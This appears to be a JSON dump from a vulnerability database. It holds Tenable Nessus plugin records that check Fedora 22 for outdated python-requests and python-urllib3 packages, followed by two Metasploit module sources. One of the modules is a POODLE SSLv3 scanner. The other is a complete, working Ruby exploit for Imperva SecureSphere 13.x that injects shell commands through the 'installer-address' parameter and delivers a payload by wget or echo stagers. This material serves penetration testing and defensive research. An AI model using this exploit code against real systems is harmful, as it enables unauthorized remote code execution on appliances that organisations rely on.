"Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "81992", "published": "2015-03-23T00:00:00", "references": ["http://www.nessus.org/u?c5411e74", "http://www.nessus.org/u?78642937", "http://www.nessus.org/u?549f4977", "https://www.openwall.com/lists/oss-security/2015/03/14/4"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4076.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81992);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_xref(name:\"FEDORA\", value:\"2015-4076\");\n\n script_name(english:\"Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Backport of patch to not ascribe cookies to the target domain.\nhttps://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b\n2f688785a669b9aafc\nhttp://www.openwall.com/lists/oss-security/2015/03/14/4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.openwall.com/lists/oss-security/2015/03/14/4\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2015/03/14/4\"\n );\n # https://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b2f688785a669b9aafc\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5411e74\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152475.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78642937\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152476.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?549f4977\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python-requests and / or python-urllib3 packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-requests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-urllib3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"python-requests-2.5.3-2.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"python-urllib3-1.10.2-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-requests / python-urllib3\");\n}\n", "title": "Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)", "type": "nessus", "viewCount": 1}, "differentElements": ["description", "reporter", "modified", "href"], "edition": 5, "lastseen": "2019-02-21T01:23:43"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Backport of patch to not ascribe cookies to the target domain.\nhttps://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b 2f688785a669b9aafc http://www.openwall.com/lists/oss-security/2015/03/14/4\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "enchantments": {}, "hash": "23dd95123db1b7e545cffdc139ab41bd124c0f924fae18c2f0807ce55e2ec1bd", "hashmap": [{"hash": "a70e0ff4a50d0fc1a7d437706c738959", "key": "title"}, {"hash": "3b43a7bf92243b1138346ddc556544ae", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c27e4f4ee5a80216649419e531dde975", "key": "references"}, {"hash": "79c62a75cfec1baa9e8b613cac109f60", "key": "pluginID"}, {"hash": "260daf16ace2fef4f8113b9361f1de2f", "key": "sourceData"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "d6be003d09a291b4c01a5f38ea0edeb3", "key": "href"}, {"hash": "13d278b957bff02a92f3a8dc1e179309", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81992", "id": "FEDORA_2015-4076.NASL", "lastseen": "2016-09-26T17:26:45", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.2", "pluginID": "81992", "published": "2015-03-23T00:00:00", "references": ["http://www.openwall.com/lists/oss-security/2015/03/14/4", "http://www.nessus.org/u?c5411e74", "http://www.nessus.org/u?78642937", "http://www.nessus.org/u?549f4977"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4076.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81992);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_xref(name:\"FEDORA\", value:\"2015-4076\");\n\n script_name(english:\"Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Backport of patch to not ascribe cookies to the target domain.\nhttps://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b\n2f688785a669b9aafc\nhttp://www.openwall.com/lists/oss-security/2015/03/14/4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.openwall.com/lists/oss-security/2015/03/14/4\"\n );\n # https://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b2f688785a669b9aafc\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5411e74\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152475.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78642937\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152476.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?549f4977\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python-requests and / or python-urllib3 packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-requests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-urllib3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"python-requests-2.5.3-2.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"python-urllib3-1.10.2-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-requests / python-urllib3\");\n}\n", "title": "Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:26:45"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "7d99420e0ea935c1fc7c24107c83a5a4"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "06353cb7b12cf5618018a61e4425d3fa"}, {"key": "href", "hash": "e7cef654fa5a2dc8dc1cf9ea9eae2701"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "79c62a75cfec1baa9e8b613cac109f60"}, {"key": "published", "hash": "13d278b957bff02a92f3a8dc1e179309"}, {"key": "references", "hash": "83f8b101d65be54c0c1492f7fd1a515c"}, {"key": "reporter", "hash": "0c55f6f2d91bfca6a2d650fcae122dc4"}, {"key": "sourceData", "hash": "b2e160618f9f4eada932a078e2d09464"}, {"key": "title", "hash": "a70e0ff4a50d0fc1a7d437706c738959"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "5979bb8559f59b36e8ab017206e060b60d232b2f3dc12be6f8ba0eaadad88865", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/SSL_VERSION"]}, {"type": "nessus", "idList": ["UBUNTU_USN-136-2.NASL"]}], "modified": "2019-11-01T02:27:22"}, "score": {"value": -0.4, "vector": "NONE", "modified": "2019-11-01T02:27:22"}, "vulnersScore": -0.4}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4076.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81992);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_xref(name:\"FEDORA\", value:\"2015-4076\");\n\n script_name(english:\"Fedora 22 : python-requests-2.5.3-2.fc22 / python-urllib3-1.10.2-1.fc22 (2015-4076)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Backport of patch to not ascribe cookies to the target domain.\nhttps://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b\n2f688785a669b9aafc\nhttp://www.openwall.com/lists/oss-security/2015/03/14/4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.openwall.com/lists/oss-security/2015/03/14/4\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2015/03/14/4\"\n );\n # https://github.com/kennethreitz/requests/commit/3bd8afbff29e50b38f889b2f688785a669b9aafc\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5411e74\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152475.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78642937\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152476.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?549f4977\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python-requests and / or python-urllib3 packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-requests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python-urllib3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"python-requests-2.5.3-2.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"python-urllib3-1.10.2-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-requests / python-urllib3\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "81992", "cpe": ["p-cpe:/a:fedoraproject:fedora:python-requests", "cpe:/o:fedoraproject:fedora:22", "p-cpe:/a:fedoraproject:fedora:python-urllib3"], "scheme": null}
{"metasploit": [{"lastseen": "2019-11-26T16:28:27", "bulletinFamily": "exploit", "description": "This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode. This module was successfully tested on Imperva SecureSphere 13.0/13.1/ 13.2 in pre-ftl mode and unsealed gateway mode.\n", "modified": "2019-03-06T03:57:42", "published": "2019-01-08T06:18:04", "id": "MSF:EXPLOIT/LINUX/HTTP/IMPERVA_SECURESPHERE_EXEC", "href": "", "type": "metasploit", "title": "Imperva SecureSphere PWS Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Imperva SecureSphere PWS Command Injection',\n 'Description' => %q(\n This module exploits a command injection vulnerability in Imperva\n SecureSphere 13.x. The vulnerability exists in the PWS service,\n where Python CGIs didn't properly sanitize user supplied command\n parameters and directly passes them to corresponding CLI utility,\n leading to command injection. Agent registration credential is\n required to exploit SecureSphere in gateway mode.\n\n This module was successfully tested on Imperva SecureSphere 13.0/13.1/\n 13.2 in pre-ftl mode and unsealed gateway mode.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module\n ],\n 'References' =>\n [\n [ 'EDB', '45542' ]\n ],\n 'DisclosureDate' => \"Oct 8 2018\",\n 'DefaultOptions' => {\n 'SSL' => true,\n 'PrependFork' => true,\n },\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'CmdStagerFlavor' => %w{ echo printf wget },\n 'Targets' =>\n [\n ['Imperva SecureSphere 13.0/13.1/13.2', {}]\n ],\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [false, 'Agent registration username', 'imperva']),\n OptString.new('PASSWORD', [false, 'Agent registration password', '']),\n OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),\n OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15])\n ])\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ]\n end\n\n def check\n begin\n res = execute_command('id')\n rescue => e\n vprint_error(\"#{e}\")\n return CheckCode::Unknown\n end\n\n if res.body =~ /uid=\\d+/\n return CheckCode::Vulnerable\n end\n\n CheckCode::Safe\n end\n\n def exploit\n unless CheckCode::Vulnerable == check\n unless datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n print_status(\"Sending payload #{datastore['PAYLOAD']}\")\n execute_cmdstager\n end\n\n def execute_command(cmd, opts = {})\n data = {\n 'command' => 'impctl server status',\n 'parameters' => {\n 'broadcast' => true,\n 'installer-address' => \"127.0.0.1 $(#{cmd})\"\n }\n }\n\n res = send_request data\n\n return unless res\n\n if res.code == 401\n fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required')\n end\n\n unless res.code == 406 && res.body.include?(\"impctl\")\n fail_with(Failure::Unknown, 'Server did not respond in an expected way')\n end\n\n res\n end\n\n def send_request(data)\n req_params = {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'data' => data.to_json\n }\n\n if !datastore['USERNAME'].blank? && !datastore['PASSWORD'].blank?\n unless @cookie\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n })\n unless res\n fail_with(Failure::Unreachable, \"#{peer} - Connection failed\")\n end\n\n @cookie = res.get_cookies\n end\n\n req_params['cookie'] = @cookie\n req_params['headers'] = {\n 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])\n }\n end\n\n send_request_cgi(req_params, datastore['TIMEOUT'])\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/imperva_securesphere_exec.rb"}, {"lastseen": "2019-11-21T16:34:23", "bulletinFamily": "exploit", "description": "Check if an HTTP server supports a given version of SSL/TLS. If a web server can successfully establish an SSLv3 session, it is likely to be vulnerable to the POODLE attack described on October 14, 2014, as a patch against the attack is unlikely.\n", "modified": "2017-07-24T13:26:21", "published": "2014-10-17T16:25:14", "id": "MSF:AUXILIARY/SCANNER/HTTP/SSL_VERSION", "href": "", "type": "metasploit", "title": "HTTP SSL/TLS Version Detection (POODLE scanner)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/http'\n\nclass MetasploitModule < Msf::Auxiliary\n\n # Exploit mixins should be called first\n include Msf::Exploit::Remote::HttpClient\n # Scanner mixin should be near last\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'HTTP SSL/TLS Version Detection (POODLE scanner)',\n 'Description' => %q{\n Check if an HTTP server supports a given version of SSL/TLS.\n\n If a web server can successfully establish an SSLv3 session, it is\n likely to be vulnerable to the POODLE attack described on\n October 14, 2014, as a patch against the attack is unlikely.\n },\n 'Author' => 'todb',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'RPORT' => 443,\n },\n 'References' =>\n [\n [ 'URL', 'http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html'],\n [ 'OSVDB', '113251'],\n [ 'CVE', '2014-3566']\n ],\n 'DisclosureDate' => 'Oct 14 2014'\n )\n\n register_options(\n [\n Opt::SSLVersion\n ]\n )\n\n end\n\n # Fingerprint a single host\n def run_host(ip)\n begin\n res = send_request_raw({ 'uri' => '/', 'method' => 'GET' })\n fp = http_fingerprint(:response => res)\n if fp\n vprint_status(\"#{peer} connected and fingerprinted: #{fp}\")\n # TODO: Interrogate the connection itself to see what version\n # was used. Where that actually lives is eluding me. :/\n if datastore['SSL'] && datastore['SSLVersion'] == 'SSL3'\n print_good(\"#{peer} accepts SSLv3\")\n report_poodle_vuln(ip)\n end\n end\n rescue ::OpenSSL::SSL::SSLError => e\n ssl_version = e.message.match(/ state=([^\\s]+)/)[1]\n vprint_status(\"#{peer} does not accept #{ssl_version}\")\n end\n end\n\n def report_poodle_vuln(ip)\n report_vuln(\n :host => ip,\n :port => rport,\n :proto => 'tcp',\n :name => self.name,\n :info => \"Module #{self.fullname} confirmed SSLv3 is available\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n )\n end\nend\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/ssl_version.rb"}]}